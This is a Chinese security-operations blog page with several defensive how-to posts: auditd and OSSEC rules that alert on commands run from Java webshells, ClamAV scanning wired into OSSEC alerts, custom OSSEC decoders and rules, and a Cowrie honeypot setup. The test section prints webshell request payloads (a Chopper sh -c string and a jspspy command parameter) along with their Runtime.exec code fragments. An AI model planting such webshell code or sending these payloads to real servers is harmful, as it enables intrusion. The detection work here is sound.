分类目录归档:安全运维

Linux下利用auditd监控JAVA执行命令并通过OSSEC告警

0x01 Auditd服务介绍
auditd服务是Linux自带的审计系统,用来记录审计信息,从安全的角度可以用于对系统安全事件的监控。
auditd服务的配置文件位于/etc/audit/audit.rules,其中每个规则和观察器必须单独在一行中。语法如下:

-a <list>,<action> <options>

<list>配置如下:

task
每个任务的列表。只有当创建任务时才使用。只有在创建时就已知的字段(比如UID)才可以用在这个列表中。
entry
系统调用条目列表。当进入系统调用确定是否应创建审计时使用。
exit
系统调用退出列表。当退出系统调用以确定是否应创建审计时使用。
user
用户消息过滤器列表。内核在将用户空间事件传递给审计守护进程之前使用这个列表过滤用户空间事件。有效的字段只有uid、auid、gid和pid。
exclude
事件类型排除过滤器列表。用于过滤管理员不想看到的事件。用msgtype字段指定您不想记录到日志中的消息。

<action>配置如下:

never
不生成审计记录。
always
分配审计上下文,总是把它填充在系统调用条目中,总是在系统调用退出时写一个审计记录。如果程序使用了这个系统调用,则开始一个审计记录。

<options>配置如下:

-S <syscall>
根据名称或数字指定一个系统。要指定所有系统调用,可使用all作为系统调用名称。
-F <name[=,!=,<,>,<=]value>
指定一个规则字段。如果为一个规则指定了多个字段,则只有所有字段都为真才能启动一个审计记录。每个规则都必须用-F启动,最多可以指定64个规则。
常用的字段如下:
pid
进程ID。
ppid
父进程的进程ID。
uid
用户ID。
gid
组ID。
msgtype
消息类型号。只应用在排除过滤器列表上。
arch
系统调用的处理器体系结构。指定精确的体系结构,比如i686(可以通过uname -m命令检索)或者指定b32来使用32位系统调用表,或指定b64来使用64位系统调用表。
...

 

0x02 编写测试Java命令监控规则
Jboss的启动账户为nobody,添加审计规则

# grep '\-a' /etc/audit/audit.rules 
-a exclude,always -F msgtype=CONFIG_CHANGE
-a exit,always -F arch=b32 -F uid=99 -S execve -k webshell

重启服务

# service auditd restart
Stopping auditd: [ OK ]
Starting auditd: [ OK ]

使用webshell测试:
1)菜刀马测试
菜刀马传递的参数为

tom=M&z0=GB2312&z1=-c/bin/sh&z2=cd /;whoami;echo [S];pwd;echo [E]

所执行的程序如下:

else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);

审计日志如下:

type=EXECVE msg=audit(1500273887.809:7496): argc=3 a0="/bin/sh" a1="-c" a2=6364202F7765622F70726F6A6563742F7A616F6A69617379732E6A69616E73686539392E636F6D2E636563616F707379732F636563616F707379732F3B77686F616D693B6563686F205B535D3B7077643B6563686F205B455D

2)jspspy测试
jspspy传递的参数为

o=shell&type=command&command=netstat+-antlp&submit=Execute

所执行的程序如下:

String type = request.getParameter("type");
if (type.equals("command")) {
ins.get("vs").invoke(request,response,JSession);
out.println("<div style='margin:10px'><hr/>");
out.println("<pre>");
String command = request.getParameter("command");
if (!Util.isEmpty(command)) {
Process pro = Runtime.getRuntime().exec(command);
BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String s = reader.readLine();

审计日志如下:

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"

 

0x03 OSSEC监控配置
OSSEC本身已经包含了auditd事件的解码规则,例如:

<decoder name="auditd">
  <prematch>^type=</prematch>
</decoder>
.......

但是在RULES里面没有找到现成的规则,编辑local_rules.xml,新增

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

测试

[root@localhost ossec]# ./bin/ossec-logtest 
2017/07/17 16:28:26 ossec-testrule: INFO: Reading local decoder file.
2017/07/17 16:28:26 ossec-testrule: INFO: Started (pid: 9463).
ossec-testrule: Type one log per line.

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"


**Phase 1: Completed pre-decoding.
       full event: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'
       hostname: 'localhost'
       program_name: '(null)'
       log: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'

**Phase 2: Completed decoding.
       decoder: 'auditd'

**Phase 3: Completed filtering (rules).
       Rule id: '110001'
       Level: '10'
       Description: 'Java execution command'
**Alert to be generated.

然后在Agent端添加监控文件

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/audit/audit.log</location>
  </localfile>

然后jspspy执行系统命令,可以看到告警如下

[root@localhost ossec]# tail -f /var/ossec/logs/alerts/alerts.log 
** Alert 1500280231.400419: mail  - syslog,auditd,
2017 Jul 17 16:30:31 (agent-31) 10.110.1.31->/var/log/audit/audit.log
Rule: 110001 (level 10) -> 'Java execution command'
type=EXECVE msg=audit(1500280229.507:7665): argc=1 a0="pwd"

这里还需考虑的一个问题是白名单,例如公司的一些站点本身就会调用视频处理的一些功能,也会调用系统命令。所以为了避免误报,需要新增一个白名单功能。
这里我们修改一下local_rules.xml,新增白名单规则,并且放到EXECVE规则上面。

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="0">
    <if_sid>110000</if_sid>
    <regex>whoami|passwd</regex>
    <description>Java execution white list</description>
  </rule>
  <rule id="110002" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

如上所示,执行whoami和cat /etc/passwd的时候不会产生告警。

 

Linux下部署CLamAV并结合OSSEC告警

[root@server120 local]# yum install gcc openssl openssl-devel pcre pcre-devel clamav clamd -y

安装完成后,需要升级病毒库。
升级程序为/usr/bin/freshclam。
默认的配置文件为/etc/freshclam.conf,内容如下

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
/var/lib/clamav #病毒库的位置
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog yes
DatabaseOwner clam
DatabaseMirror db.local.clamav.net #病毒同步的请求地址
DatabaseMirror db.local.clamav.net #病毒同步的请求地址

这里修改一下配置文件:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
DatabaseDirectory /var/lib/clamav
UpdateLogFile /var/log/clamav/freshclam.log
DatabaseOwner clam
DatabaseMirror db.cn.clamav.net
DatabaseMirror db.local.clamav.net

然后更新一下病毒库

[root@localhost ossec]# /usr/bin/freshclam
[root@localhost clamav]# ll /var/lib/clamav/
total 341836
-rw-r--r-- 1 clam clam 693248 Jul 14 10:20 bytecode.cld
-rw-r--r-- 1 clam clam 41839208 Jul 14 10:20 daily.cvd
-rw-r--r-- 1 clam clam 307499008 Jul 14 10:03 main.cld
-rw------- 1 clam clam 156 Jul 14 10:22 mirrors.dat

其中daily.cld与daily.cvd相同,只不过daily.cvd是个压缩文件,而daily.cld不是。
freshclam会判断自从上一次检测后是否有新的更新,如果有则会下载diff文件,如果下载diff文件,则会下载一个最新的daily.cvd。

Clamav会添加一个每天执行的定时任务/etc/cron.daily/freshclam,每天更新病毒库文件。

LOG_FILE="/tmp/freshclam.log"
if [ ! -f "$LOG_FILE" ]; then
    touch "$LOG_FILE"
    chmod 644 "$LOG_FILE"
    chown clam.clam "$LOG_FILE"
fi

/usr/bin/freshclam \
    --quiet \
    --datadir="/var/lib/clamav" \
    --log="$LOG_FILE"

 

病毒库更新完成后,执行扫描任务。
这里的想法是OSSEC本身已经有了clamav扫描结果的解码和rule文件
etc/decoder.xml如下:

<decoder name="clamd">
  <program_name>^clamd</program_name>
</decoder>

<decoder name="freshclam">
  <program_name>^freshclam</program_name>
</decoder>

rules/clam_av_rules.xml如下:

  <rule id="52502" level="8">
    <if_sid>52500</if_sid>
    <match>FOUND</match>
    <description>Virus detected</description>
    <group>virus</group>
  </rule>

通过decoder可以看到这里匹配的是Syslog头中的程序为clamd,也就是必须是syslog格式才能解析告警,而默认的-l参数输出非syslog格式,如下测试:
test目录下包含了一些测试的样本文件,我拷贝之前应急拿的一个文件放到了/tmp下

[root@localhost ossec]# /usr/bin/clamscan -i -r /tmp/ -l /var/log/clamav.log
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

查看/var/log/clamav.log,可以看到非Syslog格式

[root@localhost ossec]# cat /var/log/clamav.log

-------------------------------------------------------------------------------

/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

通过查看/etc/clamd.conf可以看到里面有参数LogSyslog

[root@localhost ossec]# cat /etc/clamd.conf | grep LogSys
LogSyslog yes

可以配置开启syslog,默认输出到local6,但是测试发现这个配置文件不是默认加载的,写进去的配置无法生效,所以这里用logger来输出syslog。
修改一下rsyslog的配置

*.info;mail.none;authpriv.none;cron.none;local6.none /var/log/messages #添加local6.none
local6.notice /var/log/clamav.log

[root@localhost ossec]# service rsyslog restart
[root@localhost ossec]# /usr/bin/clamscan --infected -r /tmp -i | logger -it clamd -p local6.notice
[root@localhost ossec]# cat /var/log/clamav.log 
Jul 14 11:22:45 localhost clamd[1723]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
Jul 14 11:22:45 localhost clamd[1723]: 
Jul 14 11:22:45 localhost clamd[1723]: ----------- SCAN SUMMARY -----------
Jul 14 11:22:45 localhost clamd[1723]: Known viruses: 6300501
Jul 14 11:22:45 localhost clamd[1723]: Engine version: 0.99.2
Jul 14 11:22:45 localhost clamd[1723]: Scanned directories: 221
Jul 14 11:22:45 localhost clamd[1723]: Scanned files: 95
Jul 14 11:22:45 localhost clamd[1723]: Infected files: 1
Jul 14 11:22:45 localhost clamd[1723]: Data scanned: 2.79 MB
Jul 14 11:22:45 localhost clamd[1723]: Data read: 2.62 MB (ratio 1.06:1)
Jul 14 11:22:45 localhost clamd[1723]: Time: 11.950 sec (0 m 11 s)

这里我们用OSSEC监控一下这个文件,添加配置

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/clamav.log</location>
  </localfile>

[root@localhost ossec]# /var/ossec/bin/ossec-control restart

可以看到产生的告警如下:

[root@localhost ossec]# tail -n 5 /var/ossec/logs/alerts/alerts.log 
** Alert 1500002954.2336: mail - clamd,freshclam,virus
2017 Jul 14 11:29:14 (192.168.192.1953) any->/var/log/clamav.log
Rule: 52502 (level 8) -> 'Virus detected'
Jul 14 11:29:14 localhost clamd[2077]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

这里另外需要考虑四个问题
1)如何添加病毒库白名单
在病毒库所在目录创建文件:whitelist-signatures.ign2
以脏牛为例,添加内容:Unix.Exploit.CVE_2016_5195-2

2)文件软链问题,是否会重复扫描。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -h
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)

0表示不检测软链;1表示需要向clamscan传递参数指定文件;2表示检测软链。默认值为1。
这里创建软链测试一下

[root@server120 tmp]# ln -s /tmp/makeudp /tmp/makeudp1 

当指定follow-file-symlinks=0时,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=0 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,不传递参数,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,传递参数/tmp/makeudp,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp /tmp/makeudp
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=2时,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=2 -r /tmp 
/tmp/makeudp1: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

所以默认就不会扫描软链文件。
3)很多机器都挂载了存储,需要排除存储目录。
可以通过–exclude-dir=”^/sys”来排除掉。
10和192开头的挂载排除掉,如下所示:

df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'

4)因为是定时任务每天凌晨执行,如果扫描到了存储设备,很有可能一天扫描不完,需要做判断,如果扫描任务还存在则不扫描;另外针对这种扫描时间超长的事件也需要告警出来,所以需要新增ossec的检测规则扫描时间超过6小时告警。
rules/clam_av_rules.xml新增:

  <rule id="52510" level="7">
      <if_sid>52500</if_sid>
      <match>Time: </match>      
      <regex>\(\d\d\d\d |\(4\d\d |\(5\d\d |\(6\d\d |\(7\d\d |\(8\d\d |\(9\d\d |\(36\d |\(37\d |\(38\d |\(39\d </regex>
      <description>ClamAV scan time over 6hours</description>
  </rule>

PS:这里的正则写成\d{4}不行,[1-9]也不行,无法匹配到
然后测试一下OSSEC告警:

Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)


**Phase 1: Completed pre-decoding.
       full event: 'Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)'
       hostname: 'localhost'
       program_name: 'clamd'
       log: 'Time: 11.888 sec (360 m 11 s)'

**Phase 2: Completed decoding.
       decoder: 'clamd'

**Phase 3: Completed filtering (rules).
       Rule id: '52510'
       Level: '7'
       Description: 'ClamAV scan time over 6hours'
**Alert to be generated.

 

最终执行的定时任务脚本如下:

#!/bin/bash

WHITEDIR="^/proc/|^/sys/|^/data|^/test|/upload"
ps axu | grep clamscan | grep -v grep > /dev/null
if [[ $? == 0 ]]; then
       exit
fi
NFSDIR=`df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'`

if [[ -n $NFS ]]; then
        WHITEDIR="${WHITEDIR}|${NFSDIR}"
fi
COMMAND="/usr/bin/clamscan  -i --exclude-dir='${WHITEDIR}' -r / | logger -it clamd  -p local6.notice"

if [ -f "/usr/bin/clamscan" ];then
        eval $COMMAND &
fi

 

【OSSEC】日志泛化及告警规则配置

OSSEC是一款开源的多平台的入侵检测系统,可以运行于Windows, Linux, OpenBSD/FreeBSD, 以及 MacOS等操作系统中。包括了日志分析,全面检测,root-kit检测。

1. 测试和验证OSSEC泛化及告警规则

OSSEC默认具有一个ossec-logtest工具用于测试OSSEC的泛化及告警规则。该工具一般默认安装于目录 /var/ossec/bin 中。

使用示例:

 

/var/ossec/bin/ossec-logtest
2014/06/1113:15:36 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:15:36 ossec-testrule: INFO: Started (pid: 26740).
ossec-testrule: Type one log per line.
Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

**Phase 1: Completed pre-decoding.
full event: 'Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Accepted publickey for root from 172.16.24.121 port 38720 ssh2'

**Phase 2: Completed decoding.
decoder: 'sshd'
dstuser: 'root'
srcip: '172.16.24.121'

**Phase 3: Completed filtering (rules).
Rule id: '10100'
Level: '4'
Description: 'First time user logged in.'
**Alert to be generated.

如上文所示,当输入日志内容:

Jun 1021:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for rootfrom 172.16.24.121 port 38720 ssh2

该条日志经过三步处理,生成了一条4级告警,规则ID为10100,内容为“First time user logged in.”

使用ossec-logtest-v命令,可获取更详细的日志分析逻辑。

/var/ossec/bin/ossec-logtest -v
2014/06/11 13:44:52 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:44:52 ossec-testrule: INFO: Started (pid: 27091).
ossec-testrule: Type one log per line.

Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Did not receive identification string from 172.16.24.121'

**Phase 2: Completed decoding.
decoder: 'sshd'
srcip: '172.16.24.121'

**Rule debugging:
Trying rule: 1 - Generic template for all syslog rules.
*Rule 1 matched.
*Trying child rules.
Trying rule: 5500 - Grouping of the pam_unix rules.
Trying rule: 5700 - SSHD messages grouped.
*Rule 5700 matched.
*Trying child rules.
Trying rule: 5709 - Useless SSHD message without an user/ip and context.
Trying rule: 5711 - Useless/Duplicated SSHD message without a user/ip.
Trying rule: 5721 - System disconnected from sshd.
Trying rule: 5722 - ssh connection closed.
Trying rule: 5723 - SSHD key error.
Trying rule: 5724 - SSHD key error.
Trying rule: 5725 - Host ungracefully disconnected.
Trying rule: 5727 - Attempt to start sshd when something already bound to the port.
Trying rule: 5729 - Debug message.
Trying rule: 5732 - Possible port forwarding failure.
Trying rule: 5733 - User entered incorrect password.
Trying rule: 5734 - sshd could not load one or more host keys.
Trying rule: 5735 - Failed write due to one host disappearing.
Trying rule: 5736 - Connection reset or aborted.
Trying rule: 5707 - OpenSSH challenge-response exploit.
Trying rule: 5701 - Possible attack on the ssh server (or version gathering).
Trying rule: 5706 - SSH insecure connection attempt (scan).
*Rule 5706 matched.

**Phase 3: Completed filtering (rules).
Rule id: '5706'
Level: '6'
Description: 'SSH insecure connection attempt (scan).'
**Alert to be generated.

2. 自定义日志泛化规则
2.1 添加日志源

添加日志源的方式很简单,通过修改/var/ossec/etc/ossec.conf 即可实现。

如果日志源是本地文件,可通过添加如下配置实现。

<localfile>
  <log_format>syslog</log_format>
  <location>/path/to/log/file</location>
</localfile>

如果日志源是远程syslog,可通过添加如下配置实现。

<remote>
<connection>syslog</connection>
<protocol>udp</protocol>
<port>2514</port>
<allowed-ips>172.16.24.0/24</allowed-ips>
</remote>

2.2 创建自定义的日志泛化规则

假如有两条日志如下文:

Jun 11 22:06:30172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat loginSUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:30172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERRORfrom 172.17.153.36 to 172.17.153.38 distport 3333 .

该日志使用ossec-logtest分析之后结果如下:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .



**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.16.25.130/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
No decoder matched.

由此可知OSSEC在分析日志的时候,经过了两个泛化过程:pre-decoding和 decoding。

pre-decoding过程是ossec内置的,只要是标准的syslog日志,都可以解析出如下4个基本信息。

Timestamp:Jun 11 22:06:30

Hostname: 172.17.153.38/172.16.24.32

Programe_name: /usr/bin/auditServerd

Log: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333.

在decoding过程,用户可以通过修改/var/ossec/etc/decoder.xml,实现自定义的泛化。例如在该文件中添加如下规则:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>

再次执行/var/ossec/bin/ossec-logtest

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'

发现,该条日志成功命中了名为auditServerd的规则,该条规则可以准确的将日志定位为是程序auditServerd所发出的。

除此之外,基于auditServerd这条规则,我们还可以添加更多的子规则,来识别出更多的信息。如:

<decoder name="auditServerd">                               
  <program_name>/usr/bin/auditServerd</program_name>                        
</decoder>                                                                                                                                                                                                                                       
<decoder name="auditServerd-login">                                      
  <parent>auditServerd</parent>                           
  <regex offset="after_parent">^User (\S+) login (\S+) from (\S+) to (\S+) distport (\S+) \.$</regex>  
  <order>user,status,srcip,dstip,dstport</order>                                
</decoder>

再次执行/var/ossec/bin/ossec-logtest,可获取更多的信息,如下:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32/usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status:'SUCEESS'
srcip: '172.17.153.36'
dstip: '172.17.153.

用户通过配置上述正则表达式,获取特定字段,用于后续的关联分析。OSSEC一共内置了14个用户可解析的字段:

   - location - where the log came from (only on FTS)

   - srcuser  - extracts the source username

   - dstuser  - extracts the destination (target) username

   - user     - an alias to dstuser (only one of the two can be used)

   - srcip    - source ip

   - dstip    - dst ip

   - srcport  - source port

   - dstport  - destination port

   - protocol - protocol

   - id       - event id 

   - url      - url of the event

   - action   - event action (deny, drop, accept, etc)

   - status   - event status (success, failure, etc)

   - extra_data     - Any extra data

3. 自定义日志告警规则

3.1 规则文件路径配置

OSSEC的规则配置文件默认路径为/var/ossec/rules/,要加载规则文件,需要在/var/ossec/etc/ossec.conf 中配置,默认的配置如下:

 <ossec_config>  <!-- rules global entry -->
  <rules>
    <include>rules_config.xml</include>
    <include>pam_rules.xml</include>
    <include>sshd_rules.xml</include>
    <include>telnetd_rules.xml</include>
    <include>syslog_rules.xml</include>
    <include>arpwatch_rules.xml</include>                                                                                                                                                                                                     
     ......                                                                                                                                                                                     
    <include>clam_av_rules.xml</include>                                                                                                                                                                                                      
    <include>bro-ids_rules.xml</include>                                                                                                                                                                                                      
    <include>dropbear_rules.xml</include>                                                                                                                                                                                                     
    <include>local_rules.xml</include>                                                                                                                                                                                                        
</rules>                                                                                                                                                                                                                                      
</ossec_config>  <!-- rules global entry -->

其实通过下列配置,可以实现加载/var/ossec/rules 下的所有规则文件:

<ossec_config>
    <rules>
        <rule_dir pattern=".xml$">rules</rule_dir>
    </rules>
</ossec_config>

于泛化规则,也可以通过配置decoder_dir域来实现,如:

<ossec_config>
    <rules>
        <decoder_dir pattern=".xml$">rules/plugins/decoders</decoder_dir>
    </rules>
</ossec_config>

上述配置可将/var/ossec/rules/plugins/plugins/decoders目录下所有的xml文件都添加为OSSEC日志泛化规则。

对于更详细的配置及语法,可参考下列文档:

http://ossec-docs.readthedocs.org/en/latest/syntax/head_ossec_config.rules.html#element-rule_dir

 

3.2 OSSEC告警规则配置

例如,我们需要增加对程序auditServerd的告警规则,我们需要针对auditServerd程序新建一个规则文件,对于OSSEC中已经存在的规则文件如sshd, openbsd, vsftpd等,我们只需要在对应的文件中进行新增或修改。

首先我们新建文件

/var/ossec/rules/auditServerd_rules.xml

添加如下内容:

<group name="auditServer,">
   <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>
</group>

上述规则中,规则id 80000 用于对日志进行分组计数,假如日志中出现了泛化为auditServerd的日志,则对该日志分组为auditServer,且状态机计数加1.

规则80001描述了假如user为blackrat,srcip为172.17.153.36 则命中,并发出“User blackrat is not allowed login from 172.17.153.36!”的告警。

将该文件路径加入到文件/var/ossec/etc/ossec.conf中

  …
 <include>dropbear_rules.xml</include>                                                                                                                                                                                                     
<include>local_rules.xml</include> 
<include>auditServerd_rules.xml</include>                                                                                                                                                                                                       
</rules>                                                                                                                                                                                                                                      
</ossec_config>

执行/var/ossec/bin/ossec-logtest,结果如下:

**Phase 1: Completed pre-decoding.
       full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
       hostname: '172.17.153.38/172.16.24.32'
       program_name: '/usr/bin/auditServerd'
       log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
       decoder: 'auditServerd'
       dstuser: 'blackrat'
       status: 'SUCEESS'
       srcip: '172.17.153.36'
       dstip: '172.17.153.38'
       dstport: '3333'

**Phase 3: Completed filtering (rules).
       Rule id: '80001'
       Level: '10'
       Description: 'User blackrat is not allowed login from 172.17.153.36!'
**Alert to be generated.

3.3 关联分析告警规则

OSSEC可以实现基于因果关系、事件频次的关联分析告警,具体实现方式如下。

假如我们想要实现当来自同一IP的用户登陆auditServerd,在1分钟内达到5次登录失败时,进行告警,我们可以配置规则如下:

<group name="auditServer,">
   <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <match>SUCEESS</match>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>

  <rule id="80002" level="1">
    <if_sid>80000</if_sid>
    <match>PWD_ERROR</match>
    <group>authServer_login_failures,</group>
    <description>login auditServerd password error.</description>
  </rule>

  <rule id="80003" level="15" frequency="5" timeframe="60" ignore="30"> 
    <if_matched_group>authServer_login_failures</if_matched_group>
    <description>auditServerd brute force trying to get access to </description>       
    <description>the audit system.</description>
    <same_source_ip />
    <group>authentication_failures,</group>
  </rule>
</group>

执行/var/ossec/bin/ossec-logtest,连续五次输入日志:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .

结果如下:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status: 'PWD_ERROR'
srcip: '172.17.153.36'
dstip: '172.17.153.38'
dstport: '3333'

**Phase 3: Completed filtering (rules).
Rule id: '80003'
Level: '15'
Description: 'auditServerd brute force trying to get access to the audit system.'
**Alert to be generated.

对于OSSEC日志告警规则更详细的语法,参见:
http://ossec-docs.readthedocs.org/en/latest/syntax/head_rules.html

对于OSSEC中正则表达式的语法,参加:
http://ossec-docs.readthedocs.org/en/latest/syntax/regex.html

文章出处:
http://www.freebuf.com/articles/network/36484.html

【蜜罐】Cowrie:一款SSH / Telnet蜜罐

0x01 简介

cowrie是一款基于kippo更改的中交互ssh蜜罐,部署在公网可以用于收集恶意IP,丰富密码字典和攻击样本,部署在内网可以用于入侵感知和拖延攻击时间。

 

0x02 安装部署

修改/etc/ssh/sshd_config

将Port 22修改为Port 222

然后重启服务systemctl restart sshd

Cowrie与Kippo一样不支持Root启动,默认的启动端口是2222,所以需要通过iptables将22端口转发到2222端口

[root@localhost yum.repos.d]# systemctl start firewalld

[root@localhost yum.repos.d]# firewall-cmd --permanent --add-port=222/tcp

success

[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-masquerade --permanent

success

[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent

success

[root@localhost yum.repos.d]# firewall-cmd --permanent --list-all

public (default)

  interfaces:

  sources:

  services: dhcpv6-client ssh

  ports: 222/tcp

  masquerade: yes

  forward-ports: port=22:proto=tcp:toport=2222:toaddr=

  icmp-blocks:

  rich rules:

      

[root@localhost yum.repos.d]# firewall-cmd --reload

success

安装Cowrie

yum install -y epel-release

yum install -y gcc libffi-devel python-devel openssl-devel git python-pip pycrypto

adduser cowrie -p hehe123

git clone https://github.com/micheloosterhof/cowrie.git

chown -R cowrie:cowrie cowrie/

cd cowrie

mv cowrie.cfg.dist cowrie.cfg

编辑cowrie.cfg

去掉listen_port = 2222的注释

pip install -r requirements.txt

 

0x03 数据库安装

[root@localhost data]# pip install mysql-python

[root@localhost data]# yum install mariadb-server mariadb-devel mariadb

[root@localhost data]# systemctl start mariadb

[root@localhost data]# mysqladmin -u root password hehe123

 

MariaDB [(none)]> CREATE DATABASE cowrie;

Query OK, 1 row affected (0.00 sec)

